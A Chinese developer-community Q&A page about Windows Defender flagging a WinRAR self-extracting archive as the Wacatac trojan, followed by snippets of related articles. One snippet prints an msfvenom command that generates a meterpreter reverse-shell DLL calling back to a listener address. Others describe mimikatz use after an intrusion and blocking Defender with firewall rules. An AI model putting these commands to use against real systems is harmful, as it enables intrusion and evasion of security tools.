开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

我无法使用WINRAR创建自解压文件，因为Defender说它是一个名为Wacatac的特洛伊木马程序

WINRAR是一款流行的压缩文件工具，用于创建和解压缩各种文件格式。然而，当你尝试使用WINRAR创建自解压文件时，Windows Defender可能会拦截并报告它为一个名为Wacatac的特洛伊木马程序。

Wacatac是一种恶意软件，它属于特洛伊木马家族，旨在窃取用户的个人信息、密码、银行账户等敏感信息，或者用于远程控制受感染的计算机。为了保护计算机和数据安全，Windows Defender会检测并阻止潜在的恶意软件。

如果你遇到这个问题，有几种解决方法可以尝试：

更新WINRAR：确保你使用的是最新版本的WINRAR软件。开发者通常会修复已知的安全漏洞和问题，因此更新软件可能会解决这个问题。
扫描系统：运行全面的杀毒软件扫描，以确保你的计算机没有被其他恶意软件感染。你可以使用腾讯云的云查杀服务，它可以帮助你检测和清除潜在的恶意软件。
使用其他压缩工具：如果你仍然无法使用WINRAR创建自解压文件，可以尝试使用其他压缩工具，例如7-Zip、WinZip等。这些工具提供类似的功能，并且可能不会被Windows Defender误报为恶意软件。

总结起来，当你无法使用WINRAR创建自解压文件并且遇到Windows Defender报告为Wacatac特洛伊木马时，你可以尝试更新软件、扫描系统以及使用其他压缩工具来解决问题。记得始终保持软件和系统的更新，并使用可信赖的安全软件来保护你的计算机和数据安全。

腾讯云相关产品和产品介绍链接地址：

腾讯云杀毒扫描服务：https://cloud.tencent.com/product/av
腾讯云对象存储（COS）：https://cloud.tencent.com/product/cos
腾讯云云服务器（CVM）：https://cloud.tencent.com/product/cvm
腾讯云安全组：https://cloud.tencent.com/product/sfw
腾讯云云安全中心：https://cloud.tencent.com/product/ssc

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

WinRAR曝新威胁，黑客可直接运行PowerShell

Bleeping Computer 网站披露，某些网络犯罪分子正试图在 WinRAR 自解压档案中添加恶意功能，这些档案包含无害的诱饵文件，使其能够在不触发目标系统上安全代理的情况下设置后门。...用 WinRAR 或 7-Zip 等压缩软件创建的自解压档案（SFX）本质上是包含归档数据的可执行文件，以及一个内置解压存根（解压数据的代码），对这些文件的访问可以有密码保护，以防止未经授权的访问。...野外发现 SFX 攻击 Crowdstrike 发现了一个网络犯罪分子使用窃取来的凭据滥用“utilman.exe”，将其设置为启动一个受密码保护的 SFX 文件，并且该文件之前已植入系统。...WinRAR 提供了一组高级 SFX 选项，允许添加一个可执行文件列表，以便在进程之前或之后自动运行，如果存在同名条目，还可以覆盖目标文件夹中的现有文件。...在测试过程中，安全人员创建了一个自定义的 SFX 存档以提取后运行 PowerShell 时，Windows Defender 做出了反应，然而，仅仅只记录了一次这种反应，无法复制。

1.2K6 0

CTF实战23 木马攻击技术

病毒和木马的区别与病毒相似，木马程序有很强的隐秘性，随操作系统启动而启动 特洛伊木马（简称木马）是恶意软件执行意外或未经授权的恶意的行为木马和病毒之间的主要区别是无法复制木马造成损害的系统，降低系统的安全性...远程线程注入使用OpenProcess打开试图嵌入的进程因为需要写入远程进程的内存地址空间，所以必须申请足够的权限，包括远程创建线程、远程VM操作、远程VM写权限之后就是为LoadLibraryW...函数线程启动DLL木马准备参数 LoadLibraryW函数是在kernel32.dll中定义的一个功能函数，用于加载DLL文件，它只有一个参数，就是DLL文件的绝对路径名(也就是木马DLL文件的全路径文件名...协议建立秘密通道利用反弹端口型木马的逆向连接技术建立木马连接，其中有两种类型合并端口法使用特殊的手段，在一个端口上同时绑定两个TCP或者UDP连接，通过把木马端口绑定于特定的服务端口之上，比如HTTP...使系统自毁本文完下期内容：二进制软件逆向分析基础

9552 0

黑客常用的木马工具

黑客程序里的特洛伊木马有以下的特点：（1）主程序有两个，一个是服务端，另一个是控制端。（2）服务端需要在主机执行。（3）一般特洛伊木马程序都是隐蔽的进程。...其实特洛伊木马并不是一种病毒，它没有完全具备病毒的性质。（包括：转播，感染文件等。） 特洛伊木马程序的发展历史：第一代木马：控制端 —— 连接 —— 服务端特点：属于被动型木马。...、物理及逻辑磁盘信息等多项系统数据； 4．限制系统功能：包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制； 5．远程文件操作：包括创建、上传、下载、复制、删除文件或目录、文件压缩...具体的使用，大家就看它吧。全中文介绍，也不用我多说了。其实，“冰河”本身里边有个“自动搜索”，用它来找一段区域内的IP，速度和效果，是很不错的。...因为我们是要了解整个入侵过程，而不是要令别人受害！最后，我希望大家记着：任何时候，攻击、破坏个人电脑都不是一个黑客的所为！ ? 如果清除冰河服务端：方法一：俗话说，解铃还需系铃人。

1.6K3 0

Phishing

通过这个软件可以做到图片和木马程序绑定，点击之后图片正常显示，但同时会运行绑定的程序这就让我很费解啊，有这技术，钓鱼还不要爽翻了？...0x02 揭秘这个软件本质上实现了两个功能：自解压和更改后缀自解压所谓的自解压很简单，例如winrar这类压缩软件除了正常压缩为rar、zip等后缀以外，还可以压缩成exe文件，双击exe文件后，...文件会被自动解压，而且通过配置可以做到不展示解压过程、指定解压目录和执行指定的程序我下载一个jpg文件，用msf生成一个木马 winUpdate.exe，然后使用自解压将其压缩： ?...0x04 最最后那么既然msf已经成功上线了，我们肯定想做一下权限维持，让他能够一直上线，所以这里再提一嘴权限维持：用注册表做开机自启的权限维持已经是老生常谈了，但普遍会在下面两个地方做（或者是HKLM...使用MSF生成一个DLL： msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.31.196 lport=4444 -f dll

6913 0

特洛伊木马第二代

在上篇里，我介绍了特洛伊木马第一代。有些人可能会问：为什么不介绍最新的木马啊？这是为了让大家更好地认识第一代和第二代木马。现在我就给大家介绍特洛伊木马第二代！...（五）注册表编辑及任务管理界面直观，易于操作，任务管理器功能强大，被监控端所运行的任务一目了然。（六）IP搜索不限于同一个子网，满255后会自动进位。下面，我就介绍“广外女生”的使用。...6、现在，我们就可以使用“广外女生”控制服务端主机。小铭：让我们帮它删除服务端吧，这才是一个真正黑客的行为：） ?...如何删除服务端：一，手工清除方法： 1、由于该木马程序运行时无法删除该文件，因此启动到纯DOS模式下，找到System目录下的DIAGFG.EXE，删除它。...2、由于DIAGCFG.EXE文件已经被删除了，因此在Windows环境下任何.exe文件都将无法运行。

5983 0

WinRAR曝遗留19年重大漏洞，可完全控制电脑（附解决方法）

.dll 代码库中，该代码库用于解析 ACE 格式，在解压处理的过程中存在一处目录穿越漏洞，允许解压过程中将文件写入启动文件夹中，导致系统重启后导致代码执行。...然后，攻击者可制作一个 ACE 恶意文件，当被 WinRAR 打开时，会利用 UNACEV2.dll 的目标路径，将文件解压到攻击者选择的路径中。...通过以上操作后，研究人员发现了 RAR、LZH、ACE 等压缩格式的崩溃，并且在解析 ACE 格式的崩溃时，WinRAR 使用名为 unacev2.dll 的 dll 来解析 ACE 格式文件。...示例：研究人员将 .ace 扩展名更改为 .rar 扩展名，因为 WinRAR 会根据文件内容而不是扩展名测试格式。...由于 UNACEV2.dll 自 2005 年以来就没有更新，尚无法访问其源代码，因此对于使用这个库来压缩 ACE 格式的用户来说，官方表示只能放弃对其支持。

6992 0

特洛伊木马是什么，它能造成什么损害？

因为曾经代表着一个绝妙的技巧和一个精湛的工程壮举，现在被认为是一种恶意的数字害虫，其唯一目的是在不被注意的情况下对受害者的计算机造成严重破坏。...这两种类型的特洛伊木马都可以由负责的程序员秘密远程更新，例如，病毒扫描程序无法使用新定义检测到它们。也可以通过这种方式添加新功能。银行木马银行木马是最普遍的特洛伊木马之一。...还应保护即时消息免受危险的网络钓鱼攻击。2018年1月，安全研究人员发现了一个名为Skygofree的特洛伊木马。...特洛伊木马-赎金这种类型的特洛伊木马可以修改计算机上的数据，使您的计算机无法正常运行，或者您无法再使用特定数据。犯罪分子只会在您向他们支付他们要求的赎金后恢复您的计算机性能或取消阻止您的数据。...如果通过常规渠道购买，则特洛伊木马可能造成的损害通常会超过软件的价值。顺便说一句，不应将特洛伊木马与病毒混淆。计算机病毒独立繁殖，而特洛伊木马只是一个开门器，但具有潜在的破坏性后果。

4801 0

CVE-2023-38831

WinRAR使用了ShellExecuteExW来启动目标文件，这是Windows系统的一个API函数，用于执行目标文件操作。...[影响版本]：WinRAR < 6.23 [复现过程]：准备好WinRAR小于6.23的版本，这里我随便下载安装了一个5.90版本。...文件释放：创建一个文件夹，随意命名，这里我命名为SF（释放），在文件夹中创建以下内容。...通过查阅资料和逆向工程等方式，发现WinRAR旧版本存在以下代码：也就是说，如果我们要解压的文件为“test_.txt”，就会有三种类型的字符串被匹配：“test_.txt”、“test_.txt\...就会偷偷将这两个文件连同源文件一起解压下来。文件执行：创建一个文件夹，随意命名，这里我命名为“ZX”(执行)，在文件夹中准备以下内容.

691 0

看我如何拿下BC站的服务器

新建目录，上传winrar.exe +mimikatz ? 使用上传的winrar解压，命令：winrar.exe e x64.rar ?...运行mimi.bat,这里说一下下图后面最好加上一个exit，不然的话mimikatz会不断的写日志，导致log文件越来越大,当时就犯了这样一个错误 ? ?...压缩盘下的dat文件夹，并且命名为bat.rar winrar.exe a -ag -k -r -s -ibck c:/bak.rar c:/dat/ 压缩多个文件 winrar a -ag -ibck...参数说明： a :备份所有文件； -ag :当创建压缩文件时，以格式“YYYYMMDDHHMMSS”附加当前日期字符串,文件名bakYYYYMMDDHHMMSS.rar； -k :锁定压缩文件； -r:...备份目录和子目录； -s :创建固实压缩文件； -ibck:后台运行； filename1：要压缩的文件名，可以多个，也可用通配符file* ?

1.8K4 0

用于绕过安全电子邮件网关的特制ZIP文件

如前所述，ZIP存档应该只包含一个EOCD记录，因此这表明ZIP文件是经过特殊设计的，包含两个存档结构。第一个ZIP结构用于一个诱饵的order.jpg文件，它只是一个无害的图像文件。...但是，第二个ZIP结构包含一个名为SHIPPING_MX00034900_PL_INV_pdf.exe的文件，它是远程访问木马NanoCore RAT。...攻击者创建此特制的ZIP存档，以绕过安全的电子邮件网关，其网关使用的解压缩程序可能无法正确提取恶意软件，并且只会看到无害的诱饵图像文件。...不同的文件提取器的行为不同使用各种文件提取程序打开存档时，Trustwave研究员发现每个文件提取器对存档的处理方式有所不同。...根据所使用的解压缩引擎的类型，很可能仅对诱饵文件进行审查和审查，然而恶意软件未被注意-就像某些最流行的解压工具未能解压出第二个ZIP结构。”

1.2K2 0

虹科分享 | 虹科网络安全评级 | 2022年影响最大的七大黑客攻击

2022年6月，LockBit勒索软件团伙推出了他们的恶意软件的最新变种，名为LockBit 3.0，该恶意软件带有一个漏洞赏金计划，奖励从1000美元到100万美元不等。...EmotetEmotet是一种银行特洛伊木马程序，最早出现在2014年。它主要是通过伪装来自熟悉品牌的垃圾电子邮件传播的。这些电子邮件通常包含“您的发票”或“付款详情”等消息，以诱骗用户点击恶意链接。...值得注意的是，它可以检测它是否在沙箱环境(虚拟机)中运行，并将保持非活动状态以避免检测。在互联网络中，Emotet通过暴力攻击使用一系列常见密码进行传播。...这就是为什么使用强密码保护您的环境是至关重要的。Qakbot恶意软件Qakbot自2008年以来一直活跃，是一种不断进化的特洛伊木马程序，旨在窃取密码。...最近，威胁攻击者开始使用各种技术来避免被发现，例如：Zip文件扩展名；常见文件格式的诱人文件名；恶意的Excel宏；Qakbot文件通常包含商业和金融文档的典型关键字。

4553 0

系统之家重装 iso文件用什么打开呢

最简单的说就是以iso为扩展名的文件，它是iso9660文件格式，一种光盘(CD)上的文件系统格式。...、大型网络游戏等，其共同之处都是因为软件比较大，以及涉及到商业软件等方面都可能选用将软件压制成 iso安装文件，其优点也是显而易见的，压缩成iso文件比较节省空间，并且安装简单，可以使用光盘一键安装等，...类似阅读：swf文件用什么打开dwg文件怎么打开 ③使用新版的WinRAR压缩解压软件可以打开iso文件新版本的WinRAR压缩解压软件已经可以实现打开iso文件了，不过这里需要注意一些细节设置问题，...尽管新版的WinRAR可以打开ISO文件，但是用它来解压缩ISO文件，尤其是含有中文的文件名称时，仍然会出现无法解压缩，或者是无法正常读取解压缩后的文件的现象，对于这个问题，最好是取消双击ISO文件默认打开方式为...打开iso文件设置关于新版本的WinRAR压缩软件大家可以去官方下载，解压之后的iso文件与普通软件类似，里面有安装文件，之后就是我们普通的电脑安装应用程序操作了，非常的简单，电脑百事网编辑这里就不再介绍了

2.1K2 0

黑客界在平常交流的一些专业术语介绍

每天都有人问我，黑客是什么，黑客有什么术语，或者遇到黑客，我应该怎么做，我在这里也给感兴趣的朋友普及一点小知识，黑客有很多的术语，下面我会给大家介绍黑客经常用到的术语，同时也给感兴趣的朋友普及一些有关黑客的知识...木马：就是那些表面上伪装成了正常的程序，但是当这些被程序运行时，就会获取系统的整个控制权限。有很多黑客就是热中与使用木马程序来控制别人的电脑，比如灰鸽子，黑洞，PcShare等等。...，成功登陆后就会象操作自己的电脑一样来操作主机了。...因为Radmin的控制功能非常强大，传输速度也比大多数木马快，而且又不被杀毒软件所查杀，所用Radmin管理远程电脑时使用的是空口令或者是弱口令，黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机...花指令：就是几句汇编指令，让汇编语句进行一些跳转，使得杀毒软件不能正常的判断病毒文件的构造。说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置，杀毒软件就找不到病毒了。

1.1K10 0

木马程序制作（二）

一、基础知识 1.1、木马病毒木马（Trojan）这个名字来源于古希腊传说(荷马史诗中木马计的故事，Trojan一词的本意是特洛伊的，即代指特洛伊木马，也就是木马计的故事)。...1.2、木马程序原理木马病毒的工作原理：一个完整的特洛伊木马套装程序含了两部分：服务端（服务器部分）和客户端（控制器部分）。植入对方电脑的是服务端，而黑客正是利用客户端进入运行了服务端的电脑。...运行了木马程序的服务端以后，会产生一个有着容易迷惑用户的名称的进程，暗中打开端口，向指定地点发送数据（如网络游戏的密码，即时通信软件密码和用户上网密码等），黑客甚至可以利用这些打开的端口进入电脑系统。...写程序的时候我们需要想一下要实现那些功能，写木马同样一样，首先我准备写一个后门型木马，主要的功能就是给我们开一个端口，让我们使用Telnet命令连接上去，从而控制目标计算机，作为木马，我们当然还需要隐藏自己...这是一个比较简单的正向连接后门程序。这个程序之所以说比较简单，系统重启这个木马就会被清除了。因为你并没有添加进系统启动项，隐藏进程。这个涉及的技术比较复杂，以后讲解。

1.3K2 0

ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解

Windows文件传输技巧详解1.Makecab文件压缩命令在内网渗透时，当没有rar、7z等压缩工具时候，拖取文件的时候为了防止流量过大，又必须把文件压缩，这时候可以使用Makecab工具，它是Windows...上述操作完成后，执行文件压缩命令makecab /f file.txt即可成功，但压缩多个文件的时，无法指定压缩后的格式，如图1-3所示。...（4）分卷压缩加解密1）当我们使用Rar压缩工具对数据进行分卷加密压缩时，可以执行Rar.exe a -m5 -v1m test.rar test -ppassword命令，将一个名为test的文件夹分卷压缩加密成...（3）解压文件当需要将文件解压时，可以将上述生成的test.7z文件，解压并改名为test2执行命令7z.exe x ./test.7z -o....3）当需要对分卷加密压缩的文件进行解密解压的时候，我们只需选定test.7z.001这个文件进行解密解压即可，如果我们想将上述的分卷加密压缩的文件解压到一个名为test2的文件夹中，我们即可在当前目录下执行

56315 0

再次发现黑客利用新冠疫情实施钓鱼邮件攻击

2019年11月，研究人员发现思科重定向漏洞被利用，攻击者使用开放重定向漏洞，使得合法站点允许未经授权的用户在该站点上创建URL地址，从而使访问者通过该站点重定向到另外一个站点。...按照执行流程第一个LOL.dll功能主要是通过查询WMI数据，检查系统版本和AV产品，并在启动目录下创建指向第一阶段攻击载荷的快捷方式Adobe_Process.exe.lnk ?...其余两个文件一个就是最终的木马程序WARZONE RAT，另外一个26.dll在功能上更像是一个加载模块，负责加载执行木马程序。...同时，还提供DOC和EXCEL exploit的定制服务。 WARZONE RAT因为木马文件中存在字符串AVE_MARIA，又被安全厂商识别为Ave Maria。...特权提升针对不同版本的操作系统使用不同的方法： 1.通过添加Windows Defender排除项提升权限 ?

1.9K5 0

rootkit后门检查工具RKHunter

MD5校验测试, 检测任何文件是否改动. 2. 检测rootkits使用的二进制和系统工具文件. 3. 检测特洛伊木马程序的特征码. 4....检测大多常用程序的文件异常属性. 5. 执行一些系统相关的测试 - 因为rootkit hunter可支持多个系统平台. 6....例如, 在检测/dev/.udev和/etc/.pwd.lock文件时候, 我的系统被警告. 8. 对一些使用常用端口的应用程序进行版本测试....如果被 rootkit 之类的程序包攻击后 ( 也就是上一节的检测表中的第二部分所攻击时 )，那么最好最好直接重新安装系统，不要存在说可以移除 rootkit 或者木马程序的幻想，因为，『隐藏』本来就是...简单的说： 1.将原主机的网络线拔除； 2.备份您的数据，最好备份成两部分，一部份是全部的系统内容，越详尽越好，包括 binary files 与 logfile 等等，至于另一部份则可以考虑仅备份重要的数据文件即可

4.1K1 0

技术分享 | 如何利用防火墙规则阻止Windows Defender

技术分析虽然这种技术目前仍然有效，但想要创建一个包含了所有已知MD主机服务URL的防火墙规则其实是非常麻烦的。...浏览一下这个列表，我们发现有几个进程显示为与MD for Endpoint无关的进程。比如说Teams.exe，它是微软的官方团队客户端，虽然它会给已知的MD URL发送事件。...SenseCncProxy.exe：Defender for Endpoint的主服务可执行文件，它将以服务的形式运行，服务名为“Sense”。...（Windows 10） MpCmdRun.exe：Microsoft Defender Antivirus主服务的可执行文件，它将以服务的形式运行，服务名为“WinDefend”。...MonitoringHost.exe：作为HealthService的子进程生成的可执行文件，它是Microsoft Monitoring Agent的一部分，在使用以前版本的Windows（Server

2.2K1 0

内附POC以及干货 | WinRAR代码执行漏洞威胁预警

攻击者只需利用此漏洞构造恶意的压缩文件，并以钓鱼邮件、网盘、论坛等方式诱导受害者下载恶意构造文件，当受害者使用WinRAR解压该恶意文件时，即完成整个攻击过程。...该漏洞存在于WinRAR使用的ACE库中，在WinRAR解压缩.ACE文件时，由于没有对文件名进行充分过滤，导致其可实现目录穿越，将恶意文件写入任意目录，为攻击者增加后门植入方式。...WinRAR是一个用于Windows系统的解压缩工具，可以创建查看rar或zip文件格式的压缩文件，并支持解压多种压缩文件格式。全世界超过5亿用户使用WinRAR，是最受欢迎的压缩工具。...因为文章涉及到敏感的攻击行为，所以好多需要打马赛克，或者是本地以演示的形式表现出来。当这个行业做久了，你也终有一天发现原来事物的本质是如此重要。比如内网渗透的本质是信息搜集。...当年某大佬把这条经验传递给我，同样，今天变成老家伙的我，也希望把这条经验传递下去 https://github.com/Micropoor/Micro8

7172 0

Antimalware Service Executable 高内存的处理办法，亲测有效

大家好，又见面了，我是你们的朋友全栈君。...立即什么是msmpeng.exe反恶意软件服务可执行文件？您是否使用Windows Defender保护您的计算机？...可能导致系统速度降低的另一个Windows Defender功能是其“ 完全扫描”功能，该功能可以对计算机上的所有文件进行全面检查。完全扫描严重依赖于CPU，因此不怕使用系统可用的任何资源。...为此，请双击 Windows Defender预定扫描，选择“触发器”选项卡，然后单击“新建”。创建适合您需求的新扫描计划，选择在保护和系统效率之间取得平衡的选项。...Windows Defender是一个有价值的工具，特别是因为它是操作系统附带的免费软件，但是它肯定会浪费系统的CPU。

25.6K2 1

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭